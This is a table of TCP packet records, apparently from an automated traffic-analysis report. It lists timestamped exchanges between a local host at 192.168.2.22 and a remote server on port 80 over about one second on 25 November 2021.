
Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2021 19:26:21.722779036 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:21.836700916 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:21.836843014 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:21.837522030 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:21.956288099 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:21.956321955 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:21.956343889 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:21.956367016 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:21.956376076 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:21.956423998 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:21.956429958 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.070780039 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.070812941 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.070841074 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.070871115 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.070902109 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.070926905 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.070946932 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.070955038 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.070976973 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.071001053 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.071007967 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.071012974 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.071027994 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.071037054 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.184371948 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.184441090 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.184498072 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.184514046 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.184549093 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.184560061 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.184590101 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.184623003 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.184679985 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.184710979 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.184720039 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.184740067 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.184772015 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.184804916 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.184839010 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.184895039 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.184904099 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.184958935 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.185014009 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.185019970 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.185067892 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.185080051 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.185105085 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.185137987 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.185144901 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.185198069 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.185224056 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.185256004 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.185260057 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.185316086 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.185342073 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.185373068 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.187540054 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.298842907 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.298919916 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.298974037 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.299029112 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.299087048 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.299141884 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.299176931 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.299200058 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.299251080 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.299257040 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.299259901 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.299266100 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.299269915 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.299314976 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.299335003 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.299371958 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.299401045 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.299432039 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.299473047 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.299489021 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.299511909 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.299545050 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.299554110 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.299602985 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.299618959 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.299660921 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.299678087 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.299716949 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.299731970 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.299774885 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.299797058 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.299833059 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.299849987 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.299890041 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.299906015 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.299947023 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.299962997 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.299999952 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.300050020 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.300096035 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.300106049 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.300141096 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.300163031 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.300219059 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.300225019 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.300235033 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.300275087 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.300296068 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.300332069 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.300353050 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.300391912 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.300399065 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.300448895 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.300473928 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.300507069 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.300529957 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.300564051 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.300586939 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.300620079 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.300623894 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.300694942 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.303335905 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.413893938 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.413952112 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.414004087 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.414062977 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.414120913 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.414175987 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.414221048 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.414233923 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.414282084 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.414294958 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.414310932 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.414319038 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.414364100 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.414403915 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.414419889 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.414474010 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.414479017 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.414509058 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.414537907 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.414570093 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.414597034 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.414614916 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.414658070 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.414675951 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.414716959 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.414731979 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.414773941 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.414792061 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.414830923 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.414834976 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.414891958 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.414916992 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.414948940 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.414966106 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.415009022 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.415018082 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.415067911 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.415087938 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.415124893 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.415143013 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.415182114 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.415183067 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.415241003 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.415268898 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.415309906 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.416479111 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.416538000 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.416584015 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.416595936 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.416654110 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.416671038 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.416713953 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.416731119 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.416773081 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.416785002 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.416832924 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.416853905 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.416897058 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.416933060 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.416990995 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.417007923 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.417053938 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.417090893 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.417114019 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.417131901 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.417174101 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.417188883 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.417233944 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.417265892 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.417293072 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.417301893 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.417351961 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.417361021 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.417412043 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.417432070 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.417469978 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.417493105 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.417529106 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.417546034 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.417583942 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.417601109 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.417644024 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.417654991 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.417701006 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.417732954 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.417757988 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.417757988 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.417817116 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.417834044 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.417872906 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.417903900 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.417957067 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.418050051 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.528800964 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.528913021 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.528955936 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.528994083 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.529032946 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.529069901 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.529078007 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.529110909 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.529119968 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.529128075 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.529146910 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.529155016 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.529190063 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.529273033 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.531822920 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.531878948 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.531919956 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.531930923 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.531961918 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.531971931 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532002926 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.532038927 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532044888 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.532052994 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532058954 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532083988 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.532124996 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.532140970 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532165051 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.532176018 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532205105 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.532238960 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532244921 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.532258987 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532282114 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532284975 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.532325029 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.532345057 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532365084 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.532397032 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532404900 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.532432079 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532449007 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.532464027 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532490015 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.532512903 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532527924 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.532541037 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532567024 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.532588005 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532605886 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.532619953 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532645941 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.532660961 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532686949 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532686949 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.532725096 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.532738924 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532763958 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.532772064 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532804012 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.532825947 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532841921 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.532869101 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532886028 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532917976 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.532958984 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.532977104 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.532996893 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.533020973 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.533037901 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.533076048 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.533077955 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.533091068 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.533113956 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.533121109 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.533155918 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.533179998 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.533195019 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.533198118 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.533235073 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.533267021 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.533276081 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.533313990 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.533314943 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.533324003 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.533338070 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.533354044 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.533370972 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.533394098 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.533395052 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.533432007 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.533448935 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.533478975 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.541234016 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.642587900 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.642652035 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.642671108 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.642690897 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.642703056 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.642733097 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.642735004 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.642771959 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.642782927 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.642812014 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.642817020 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.642853022 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.642858028 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.642891884 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.642896891 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.642946005 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.647530079 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.647588968 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.647609949 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.647629023 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.647636890 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.647671938 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.647674084 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.647712946 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.647715092 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.647753000 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.647758007 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.647792101 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.647800922 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.647831917 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.647840023 CET	49167	80	192.168.2.22	107.173.229.133
